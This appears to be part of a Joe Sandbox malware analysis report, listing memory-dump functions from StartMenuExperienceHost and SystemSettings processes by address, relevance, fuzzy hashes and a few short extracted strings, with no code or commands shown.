                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_35_2_7ff848f30000_StartMenuExperienceHost.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 54a29490b25be4d1f687d85187173f71a11f446f393feb6a85da4fb50b520c7c
                                                                  • Instruction ID: f0fa7df12c5de988e157799f020e772424a9a45317f46197cb7153b8d9332302
                                                                  • Opcode Fuzzy Hash: 54a29490b25be4d1f687d85187173f71a11f446f393feb6a85da4fb50b520c7c
                                                                  • Instruction Fuzzy Hash: 9121E136A0D28ADEE312BB6898511EC7B60EF823A5F1442B3D448CA1C3DB3C6546C799
                                                                  Function 00007FF848F31996 Relevance: .1, Instructions: 60COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000023.00000002.2270335718.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_35_2_7ff848f30000_StartMenuExperienceHost.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 0177b27e6d1d6d2e01c6123903a31cef011e54f0d8477361e0bdd715d9eb0eb4
                                                                  • Instruction ID: ec756037848980c18fea1e4f06b2d5858bfdd01ad1dcee803d84f6de0d14b356
                                                                  • Opcode Fuzzy Hash: 0177b27e6d1d6d2e01c6123903a31cef011e54f0d8477361e0bdd715d9eb0eb4
                                                                  • Instruction Fuzzy Hash: 5E110031E0C80A8FEB94FB28C8556B83392AF94351F1541B7D44DD72D2EE28A9C18B48
                                                                  Function 00007FF848F30C38 Relevance: .1, Instructions: 57COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000023.00000002.2270335718.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_35_2_7ff848f30000_StartMenuExperienceHost.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 0f8a9f341fe8218e3760f55c97f3bff96735b74ee7a2d60fad55703c77019937
                                                                  • Instruction ID: 3a71bb314679097b5dec2c4f2855fe352caf3c425d435c68a085d6fca8e973f6
                                                                  • Opcode Fuzzy Hash: 0f8a9f341fe8218e3760f55c97f3bff96735b74ee7a2d60fad55703c77019937
                                                                  • Instruction Fuzzy Hash: 6411A031E0D68D8FE702FB7898411AC7BB0EF82390F1546F7C844DB2D2DA3855458785
                                                                  Function 00007FF848F30C40 Relevance: .1, Instructions: 51COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000023.00000002.2270335718.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_35_2_7ff848f30000_StartMenuExperienceHost.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: ee887375ce99bde7207ffd9602e04b0424bcdae5f5b49929560317fbb454ad21
                                                                  • Instruction ID: 5cf12bb5952646474ec6225339484417acfc79aea519d1a6811fbc1f87a7dc1f
                                                                  • Opcode Fuzzy Hash: ee887375ce99bde7207ffd9602e04b0424bcdae5f5b49929560317fbb454ad21
                                                                  • Instruction Fuzzy Hash: 57118B31E0D6898FE702FB6898500AD7BB0EF82390F1541F7D844DB2D2DA386549CB85
                                                                  Function 00007FF848F3190D Relevance: .1, Instructions: 51COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000023.00000002.2270335718.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_35_2_7ff848f30000_StartMenuExperienceHost.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 05a9d6eb68c0afeda28549dd331f9d198dbf27536d53e0cb9af3d2339b72710d
                                                                  • Instruction ID: c0d8a9ea79e3b1e6d03bb995c6e5e82d957d50c6dd058d0c4f8a482d2288db3d
                                                                  • Opcode Fuzzy Hash: 05a9d6eb68c0afeda28549dd331f9d198dbf27536d53e0cb9af3d2339b72710d
                                                                  • Instruction Fuzzy Hash: 51018031E0D81B8FE7E4FB1888143BD6292AF94391F1502B7E41DD32D2EF386D858648
                                                                  Function 00007FF848F35A29 Relevance: .0, Instructions: 40COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000023.00000002.2270335718.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_35_2_7ff848f30000_StartMenuExperienceHost.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: d2ab29812e43be77d26bdf67f9b6e55572adfc0af165cb23034f2f38da449cfc
                                                                  • Instruction ID: 2c617d74d404402299f27cf78888612442bf11477028223959333bc381ba17a8
                                                                  • Opcode Fuzzy Hash: d2ab29812e43be77d26bdf67f9b6e55572adfc0af165cb23034f2f38da449cfc
                                                                  • Instruction Fuzzy Hash: D9018431508A4ACFCB55EF08C890BA977F1FBA8314F0502AAD40DD72A1DB34EA40DF40
                                                                  Function 00007FF848F30C50 Relevance: .0, Instructions: 40COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000023.00000002.2270335718.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_35_2_7ff848f30000_StartMenuExperienceHost.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 2134e99541dd5352bd2f6c08102de2120707b3de43a6d10785432f5e6c056388
                                                                  • Instruction ID: ee7bac50d780a4a12b916f83b6fcd893ff8188c2b0b24ea6372c7eac7556f265
                                                                  • Opcode Fuzzy Hash: 2134e99541dd5352bd2f6c08102de2120707b3de43a6d10785432f5e6c056388
                                                                  • Instruction Fuzzy Hash: FD011630D0D2899FE716FB6488541AD7FB0EF86394F1941F7D844DB2D2DA38AA44C785
                                                                  Function 00007FF848F30BB5 Relevance: .0, Instructions: 36COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000023.00000002.2270335718.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_35_2_7ff848f30000_StartMenuExperienceHost.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: e6f6c32a4ff5cfaeaf2b5051f3b9089556b6f1a1877cb541a2d7b08c7f3812b8
                                                                  • Instruction ID: 2f40d33765d1bbc83eeefacfd4ba60ea863b9e80c47ded62625a5ad1b7144920
                                                                  • Opcode Fuzzy Hash: e6f6c32a4ff5cfaeaf2b5051f3b9089556b6f1a1877cb541a2d7b08c7f3812b8
                                                                  • Instruction Fuzzy Hash: 12F0E530E5E54A4FEA407338D8D24A87F60EF4B210FC504F3D488C60D2EA49589A8316
                                                                  Function 00007FF848F30B77 Relevance: .0, Instructions: 35COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000023.00000002.2270335718.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_35_2_7ff848f30000_StartMenuExperienceHost.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: a60203e813ceb39d3c82471d84d4f87af386272471654d4b582eb302ad88453c
                                                                  • Instruction ID: 70a3877ed62bfb3509e2ab12c23e84a1e87069f32e3b9ef7c5a6c927a5cc40be
                                                                  • Opcode Fuzzy Hash: a60203e813ceb39d3c82471d84d4f87af386272471654d4b582eb302ad88453c
                                                                  • Instruction Fuzzy Hash: 42F0553560E589CFDB80AB38ECA04E4BB60FF03209B5616EAD088C3092D2524409C700
                                                                  Function 00007FF848F319C3 Relevance: .0, Instructions: 35COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000023.00000002.2270335718.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_35_2_7ff848f30000_StartMenuExperienceHost.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 9fa238edc377ae3c28a821189041c77311f2d43d622b9171109d735dc1095405
                                                                  • Instruction ID: 8042e034695f520ab9c6597f4a519c9ba2bd530793a653c8d701b07bd4bf5608
                                                                  • Opcode Fuzzy Hash: 9fa238edc377ae3c28a821189041c77311f2d43d622b9171109d735dc1095405
                                                                  • Instruction Fuzzy Hash: 58F03C30E0C81A8FEBA4FB14CC546F873A1EB90392F1401B7D04E932E5DE3869C68B48
                                                                  Function 00007FF848F361A2 Relevance: .0, Instructions: 25COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000023.00000002.2270335718.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_35_2_7ff848f30000_StartMenuExperienceHost.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 56b90ccf1736245e8e2943db465f5a8918f681c939a5da53cd05dabe9b78db00
                                                                  • Instruction ID: 41e640aa316bf1bb5b6a77aa7f054218c07d893dc2d367c08d0827aa9a49684e
                                                                  • Opcode Fuzzy Hash: 56b90ccf1736245e8e2943db465f5a8918f681c939a5da53cd05dabe9b78db00
                                                                  • Instruction Fuzzy Hash: CCF03934D0C1168FF7A4A294D4513AAA3A0EB84350F1410BAE90EA33C2DE3CAE818B19
                                                                  Function 00007FF848F306A5 Relevance: .0, Instructions: 13COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000023.00000002.2270335718.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_35_2_7ff848f30000_StartMenuExperienceHost.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 53971b2b7a1ccf372673725fb3507a6dec60887fbbe3a948b12780484fbb2f21
                                                                  • Instruction ID: 326b8de8d886ff496f5c18850a3a278a94aa64266d6fa89b44eb625044fa786c
                                                                  • Opcode Fuzzy Hash: 53971b2b7a1ccf372673725fb3507a6dec60887fbbe3a948b12780484fbb2f21
                                                                  • Instruction Fuzzy Hash: E2C08C20D1F80F0AF400B32E14020ACA1009BC4390FD00073C80C401C5AE0D21C5018E
                                                                  Function 00007FF848F312B0 Relevance: .0, Instructions: 12COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000023.00000002.2270335718.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_35_2_7ff848f30000_StartMenuExperienceHost.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 85e310c31d9c320a6a6d98d9c2204c04a471e198612afe6b49aad868d401953c
                                                                  • Instruction ID: 080bbe0f0f5e2b719b9dbe9ead134434cdac85d167a41a6db6a7bd7504e0cd23
                                                                  • Opcode Fuzzy Hash: 85e310c31d9c320a6a6d98d9c2204c04a471e198612afe6b49aad868d401953c
                                                                  • Instruction Fuzzy Hash: 85C04C34555C098FC948FB29C88591477A0FB19215BD60090E409CB1B1D659DCD5C745
                                                                  Function 00007FF848F30B18 Relevance: .0, Instructions: 12COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000023.00000002.2270335718.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_35_2_7ff848f30000_StartMenuExperienceHost.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 0e13373b9b58342ce0a6d250e1279e2ab542b43c18f7d8366746ebde3e909453
                                                                  • Instruction ID: 2dd0114cb7b838ab2c4b38e2b092f044fa6d3efbaeafe2d5c2a324c08edb4883
                                                                  • Opcode Fuzzy Hash: 0e13373b9b58342ce0a6d250e1279e2ab542b43c18f7d8366746ebde3e909453
                                                                  • Instruction Fuzzy Hash: 95C04C305158099FC954F72DC98595476A0FB4D215BD50190E40DCB2B1E75A9C95C745
                                                                  Function 00007FF848F35E65 Relevance: .0, Instructions: 10COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000023.00000002.2270335718.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_35_2_7ff848f30000_StartMenuExperienceHost.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: e01ed57456579f5f6871a768b2153b78278a93a64c294064728bb1605a42e942
                                                                  • Instruction ID: 361b11c729d55a1f3d608fe4a798d7706b0b307711ede084edad4b97c9685ac2
                                                                  • Opcode Fuzzy Hash: e01ed57456579f5f6871a768b2153b78278a93a64c294064728bb1605a42e942
                                                                  • Instruction Fuzzy Hash: D3C04C11E1B81A96F266671950212BE48579F84788F946076E50EC73CACF4C5B41428F
                                                                  Function 00007FF848F306C8 Relevance: .0, Instructions: 8COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000023.00000002.2270335718.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_35_2_7ff848f30000_StartMenuExperienceHost.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 6eba791d88507fcd9b52fcee0306e07b664c1240055e9c8e5b93111289e53873
                                                                  • Instruction ID: 8622f6891dee52e5bb6be83a981e4ac7dfc8e75a6fca5afcec18121fca364e56
                                                                  • Opcode Fuzzy Hash: 6eba791d88507fcd9b52fcee0306e07b664c1240055e9c8e5b93111289e53873
                                                                  • Instruction Fuzzy Hash: 97B00214C6F44F05E454337A195606574509B85254FD511B3D80D501C5994D15D5129A

                                                                  Executed Functions

                                                                  Function 00007FF848F20D4C Relevance: 1.5, Strings: 1, Instructions: 258COMMON
                                                                  Download Yara Rule
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000024.00000002.2283779888.00007FF848F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F20000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_36_2_7ff848f20000_SystemSettings.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: 5Z_H
                                                                  • API String ID: 0-3267294416
                                                                  • Opcode ID: 450c7592671ae23874040d1400e1da2057775bce35714bfafca48519c768c026
                                                                  • Instruction ID: edda11f9d3e19186273f7129c1e118c08743b5e511a55bebae36ca8489e8f1e8
                                                                  • Opcode Fuzzy Hash: 450c7592671ae23874040d1400e1da2057775bce35714bfafca48519c768c026
                                                                  • Instruction Fuzzy Hash: 07910072D1DA9A8FE789EB6C98697A9BFF1FB95350F0000BAC109D72D2CF7918158701
                                                                  Function 00007FF848F20B3F Relevance: 3.8, Strings: 3, Instructions: 55COMMON
                                                                  Download Yara Rule
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000024.00000002.2283779888.00007FF848F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F20000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_36_2_7ff848f20000_SystemSettings.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: c9$!k9$"s9
                                                                  • API String ID: 0-3426396564
                                                                  • Opcode ID: feaa998f5ca3c220e03cd0105a0c752630588e44680650cacc5706f469bfa266
                                                                  • Instruction ID: ba731a2ff701c1ff3eb2f9f24a765302349bddb1563c4b93ddaa09ce362c202a
                                                                  • Opcode Fuzzy Hash: feaa998f5ca3c220e03cd0105a0c752630588e44680650cacc5706f469bfa266
                                                                  • Instruction Fuzzy Hash: A601493771D9664BD741773DFC905D8BB40EB9627679506BBD184C7192E241144AC3D0
                                                                  Function 00007FF848F53A9D Relevance: 2.7, Strings: 2, Instructions: 235COMMON
                                                                  Download Yara Rule
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000024.00000002.2283779888.00007FF848F51000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F51000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_36_2_7ff848f51000_SystemSettings.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: @aH$M
                                                                  • API String ID: 0-2096102131
                                                                  • Opcode ID: 0ec52af79eef6a797467c24de4b96c2724bff498984bc2cb5cfb1786ff493225
                                                                  • Instruction ID: 4ecaf32d091882ceea66fe503d06e7aa2b74e07488d1b9520e447a801f930cdd
                                                                  • Opcode Fuzzy Hash: 0ec52af79eef6a797467c24de4b96c2724bff498984bc2cb5cfb1786ff493225
                                                                  • Instruction Fuzzy Hash: 0271C132E0C95A5FEA99FB2C84662B4B6D1FF56391F8405B9C00DC72C3DE2CAC868745
                                                                  Function 00007FF848F52268 Relevance: 1.3, Strings: 1, Instructions: 64COMMON
                                                                  Download Yara Rule
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000024.00000002.2283779888.00007FF848F51000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F51000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_36_2_7ff848f51000_SystemSettings.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: M
                                                                  • API String ID: 0-3664761504
                                                                  • Opcode ID: dc65db4ae4a1ab43ad1d0e4b6f33e3b9c2528860ab74486179f326f4ed30157d
                                                                  • Instruction ID: 5362d00ecaa7a5a969375e4eeb113dc4d743df5304e2f949abfcf4eb87716c56
                                                                  • Opcode Fuzzy Hash: dc65db4ae4a1ab43ad1d0e4b6f33e3b9c2528860ab74486179f326f4ed30157d
                                                                  • Instruction Fuzzy Hash: 35119D3184F3C14FEB07A7344868995BFA0AF53255B0D82EED095CF0E3DA6A484AC712
                                                                  Function 00007FF848F5A569 Relevance: 1.3, Strings: 1, Instructions: 29COMMON
                                                                  Download Yara Rule
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000024.00000002.2283779888.00007FF848F51000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F51000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_36_2_7ff848f51000_SystemSettings.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: M
                                                                  • API String ID: 0-3664761504
                                                                  • Opcode ID: d0676e24e96bd385dc04f3fb5ab814f47850c6a6534832e8c14487367f2385e4
                                                                  • Instruction ID: 42a85964706cc06926d49ac6abc63d86f823d33bf9f4328828610c9088c79b8f
                                                                  • Opcode Fuzzy Hash: d0676e24e96bd385dc04f3fb5ab814f47850c6a6534832e8c14487367f2385e4
                                                                  • Instruction Fuzzy Hash: 7EE06571A0E7844FC719EA344459454BF60EF6720174941EEC045CF1A3EA2DC886C701
                                                                  Function 00007FF848F33CC9 Relevance: 1.3, Strings: 1, Instructions: 28COMMON
                                                                  Download Yara Rule
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000024.00000002.2283779888.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_36_2_7ff848f30000_SystemSettings.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: M
                                                                  • API String ID: 0-3664761504
                                                                  • Opcode ID: fccb70ec21a2c3ed0c3b9d58c943c1cd4b746454764ffd85200c3db3ff374b44
                                                                  • Instruction ID: 4761d3bb6e8c5cb767358201678669bf1a457c0cc8f5a4b7e2db7605fe3fd1b2
                                                                  • Opcode Fuzzy Hash: fccb70ec21a2c3ed0c3b9d58c943c1cd4b746454764ffd85200c3db3ff374b44
                                                                  • Instruction Fuzzy Hash: 6FF06571A0E7C04FC715AB348469455BFA0EF6721174941EEC045CF1A7EA2D9C85CB41
                                                                  Function 00007FF848F53609 Relevance: 1.3, Strings: 1, Instructions: 28COMMON
                                                                  Download Yara Rule
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000024.00000002.2283779888.00007FF848F51000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F51000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_36_2_7ff848f51000_SystemSettings.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: M
                                                                  • API String ID: 0-3664761504
                                                                  • Opcode ID: 3076cf459687321224178ac50af6658c038033d25900b3ffd36c31a4ba42240d
                                                                  • Instruction ID: 6d91390a3181b9bc3f26c66fe6aba2e6b33ba306a0782361312dd739a70a3054
                                                                  • Opcode Fuzzy Hash: 3076cf459687321224178ac50af6658c038033d25900b3ffd36c31a4ba42240d
                                                                  • Instruction Fuzzy Hash: 72F0307150E7C54FC75AEA388869455BF60EF6721174A52EFC045CF2A3EA298C85C711
                                                                  Function 00007FF848F52319 Relevance: 1.3, Strings: 1, Instructions: 27COMMON
                                                                  Download Yara Rule
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000024.00000002.2283779888.00007FF848F51000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F51000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_36_2_7ff848f51000_SystemSettings.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: M
                                                                  • API String ID: 0-3664761504
                                                                  • Opcode ID: 21bb7ab671a7c18f2c7a8db96f44953d26707d75b87d4a3031d260b0ed5fb832
                                                                  • Instruction ID: 8055a4b1226b5d9c3daa5f2e45af7098b1d492a8b02259d60570deff207d18ff
                                                                  • Opcode Fuzzy Hash: 21bb7ab671a7c18f2c7a8db96f44953d26707d75b87d4a3031d260b0ed5fb832
                                                                  • Instruction Fuzzy Hash: DDF0E57190E3C04FC706EB348868404BFA0EF2720174941EEC046CF2A3EA2D9C85C701
                                                                  Function 00007FF848F5A5F9 Relevance: 1.3, Strings: 1, Instructions: 26COMMON
                                                                  Download Yara Rule
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000024.00000002.2283779888.00007FF848F51000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F51000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_36_2_7ff848f51000_SystemSettings.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: M
                                                                  • API String ID: 0-3664761504
                                                                  • Opcode ID: 4b7847441db77ca2348d303fb15cdd4d2da3a3e065ef733f179b8bfc3901390c
                                                                  • Instruction ID: e9621f717fe131509cc8430e1c96714fce06537ce22191bd59f9bebc65db5831
                                                                  • Opcode Fuzzy Hash: 4b7847441db77ca2348d303fb15cdd4d2da3a3e065ef733f179b8bfc3901390c
                                                                  • Instruction Fuzzy Hash: E0E06D71A0E7C44FC71AAA34886D454BFA0EF6721174A42EFC445CF1A7EA2D8889C701
                                                                  Function 00007FF848F5AB39 Relevance: 1.3, Strings: 1, Instructions: 25COMMON
                                                                  Download Yara Rule
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000024.00000002.2283779888.00007FF848F51000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F51000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_36_2_7ff848f51000_SystemSettings.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: I
                                                                  • API String ID: 0-3707901625
                                                                  • Opcode ID: 262d1adc32f85b937d2f1f6406f094318634670aa182e29e9c3f59b4cf3a075e
                                                                  • Instruction ID: bd75a72fad17517514f734abbf2b35e72d9d0a4896b9c5dd5ae4b2d6763618b2
                                                                  • Opcode Fuzzy Hash: 262d1adc32f85b937d2f1f6406f094318634670aa182e29e9c3f59b4cf3a075e
                                                                  • Instruction Fuzzy Hash: 97E01A7184E7C04FCB4AEB3488698547FA1EE67211B8A40EEC089CF1A3E62D984AC701
                                                                  Function 00007FF848F523A9 Relevance: 1.3, Strings: 1, Instructions: 25COMMON
                                                                  Download Yara Rule
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000024.00000002.2283779888.00007FF848F51000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F51000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_36_2_7ff848f51000_SystemSettings.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: I
                                                                  • API String ID: 0-3707901625
                                                                  • Opcode ID: 27abea763f53eb22132d75c5cd3980eea3118a4a08247f01ed7b6e96340a68e9
                                                                  • Instruction ID: 73f78f0a56d1e1224f643e2eea35d90c7713fa15fe595418693445892eee9213
                                                                  • Opcode Fuzzy Hash: 27abea763f53eb22132d75c5cd3980eea3118a4a08247f01ed7b6e96340a68e9
                                                                  • Instruction Fuzzy Hash: 86E0ED7144E7D08FC70AEB7488658547F60EE6721174A51DED045CF1B3E6299849C701
                                                                  Function 00007FF848F57E49 Relevance: 1.3, Strings: 1, Instructions: 23COMMON
                                                                  Download Yara Rule
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000024.00000002.2283779888.00007FF848F51000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F51000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_36_2_7ff848f51000_SystemSettings.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: I
                                                                  • API String ID: 0-3707901625
                                                                  • Opcode ID: c7e515f9ba46f650a42dd5c45e5417130f345a45bf17762be80aa9faa3f7763d
                                                                  • Instruction ID: 9ba32f73f597d7e19eee2818d7e334769edfbeb585aa6b095c06ea1765b049d9
                                                                  • Opcode Fuzzy Hash: c7e515f9ba46f650a42dd5c45e5417130f345a45bf17762be80aa9faa3f7763d
                                                                  • Instruction Fuzzy Hash: E3E0ED7184E7C44FC746EB74886A849BFA0AE6721174A40EEC045CF1A3E62E8845C701
                                                                  Function 00007FF848F5AC7D Relevance: .2, Instructions: 205COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000024.00000002.2283779888.00007FF848F51000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F51000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_36_2_7ff848f51000_SystemSettings.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 9c135538c2b52ab409204df5b6c07638d82299f702d8b8693708d7b6fe0d8532
                                                                  • Instruction ID: 2a1e7dfcaf92d93f7f0b7b15451c303d0aaa7ff3b89be2294b7ef6c664d19821
                                                                  • Opcode Fuzzy Hash: 9c135538c2b52ab409204df5b6c07638d82299f702d8b8693708d7b6fe0d8532
                                                                  • Instruction Fuzzy Hash: 4151BF31E0E95A4FE79AB729849A6B8B691FF94350F4401B9D00DC72C7DE2CACD28385
                                                                  Function 00007FF848F59061 Relevance: .1, Instructions: 149COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000024.00000002.2283779888.00007FF848F51000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F51000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_36_2_7ff848f51000_SystemSettings.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 9988192ac534244a0dde24b66317e97ecd699b1607d9057b3ffd8f7623b84097
                                                                  • Instruction ID: 2eac3dfbf197dd655b7426b3e33d9162bc538f0dbdf6b423ecd32b809ccb286e
                                                                  • Opcode Fuzzy Hash: 9988192ac534244a0dde24b66317e97ecd699b1607d9057b3ffd8f7623b84097
